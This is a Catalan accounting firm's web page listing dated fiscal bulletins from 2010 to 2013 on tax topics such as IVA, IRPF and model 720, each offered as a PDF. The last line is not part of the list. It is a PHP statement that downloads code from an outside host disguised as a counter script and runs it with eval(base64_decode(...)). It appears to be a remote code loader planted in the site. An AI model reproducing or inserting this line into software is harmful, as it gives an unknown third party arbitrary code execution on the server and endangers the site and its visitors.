Informació Fiscal

» 14/02/2013 Obligació de declarar béns i drets situats a l'estranger - model 720 (Autor: Ass. Arxer; document PDF)

» 31/01/2013 Model 347 - Presentació mes de febrer (Autor: Ass. Arxer; document PDF)

» 18/01/2013 Canvi de criteri en la deducció de l'IVA en certificacions d'obra (Autor: Ass. Arxer; document PDF)

» 24/12/2012 - Novetats nou reglament de facturació (Autor: Ass. Arxer; document PDF)

» 10/12/2012 - Previsió IRPF 2012  (Autor: Ass. Arxer; document PDF)

» 22/11/2012 - Mòduls - Novetats (Autor: Ass. Arxer; document PDF)

» 08/11/2012 - IVA-Canvis importants operacions inmobiliàries (Autor: Ass. Arxer; document PDF)

» 19/09/2012 - Obligacions pagador - tipus de retenció professional IRPF (Autor: Ass. Arxer; document PDF)

» 20/07/2012 - Novetats IVA (Autor: Ass. Arxer; document PDF)

» 21/05/2012 - Exempció 50% Transmissió immobles (Autor: Ass. Arxer; document PDF)

» 20/04/2012 - Avantprojecte de llei de mesures de lluita contra el frau fiscal (Autor: Ass. Arxer; document PDF)

» 12/04/2012 - Mesures tributàries estatals (Autor: Ass. Arxer; document PDF)

» 14/03/2012 - Augment tipus impositiu actes jurídics documentats (Autor: Ass. Arxer; document PDF)

» 17/02/2012 - Pagaments fraccionats 2012 (Autor: Ass. Arxer; document PDF)

» 08/02/2012 - Novetats Fiscas any 2012 (Autor: Ass. Arxer; document PDF)

» 03/01/2012 - Retencions arrendaments i capital mobiliari (Autor: Ass. Arxer; document PDF)

» 14/12/2011  - Apunts Fiscals (Autor: Ass. Arxer; document PDF)

» 15/11/2011  - Alta/Baixa Registre devolució mensual (Autor: Ass. Arxer; document PDF)

» 13/10/2011 Modificacions impost sobre societats (Autor: Ass. Arxer; document PDF)

» 01/09/2011 Nodificació temporal IVA venda habitatges nous (Autor: Ass. Arxer; document PDF)

» 16/06/2011 Model 159 - Declaració anual de consum d'energia elèctrica (Autor: Ass. Arxer; document PDF)

» 28/03/2011 Nou model 111 - Retencions IRPF (Autor: Ass. Arxer; document PDF)

» 23/03/2011 Incidències amb les notificacions electròniques obligatòries (Autor: Ass. Arxer; document PDF)

» 10/03/2011 Pla de control tributari any 2011 (Autor: Ass. Arxer; document PDF)

» 17/02/2011 ITPAJD - Operacions societàries (Autor: Ass. Arxer; document PDF)

» 11/02/2011 Pagament fraccionats 2011 (Autor: Ass. Arxer; document PDF)

» 10/01/2011 Notificacions electròniques obligatòries (Autor: Ass. Arxer; document PDF)

» Reial Decret-Llei 13/2010 - Actuacions en l'àmbit Fiscal (Autor: Ass. Arxer; document PDF)

» Comunicació 22/2010 - Apunts Fiscals (Autor: Ass. Arxer; document PDF)

» IRPF - Deducció Adquisició Habitatge Habituall (Autor: Ass. Arxer; document PDF)

» IVA - ALTA / BAIXA Registre devolució mensual (Autor: Ass. Arxer; document PDF)

» Mesures Contra la Morositat (Autor: Ass. Arxer; document PDF)

» Finalització Règim Transitori Recuperació IVA en Impagats (Autor: Ass. Arxer; document PDF)

» Domiciliació de Rebuts a un Compte Bancari (Autor: Ass. Arxer; document PDF)

» Modificació IVA - Aplicació Nous Tipus d'IVA (Autor: Ass. Arxer; document PDF)

» Mesures urgents en màteria Fiscal per la reducció del dèficit públic a Catalunya (Autor: Ass. Arxer; document PDF)

» Modificacions en màteria de les obligacions de documentació de les operacions vinculades (Autor: Ass. Arxer; document PDF)

 
 

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));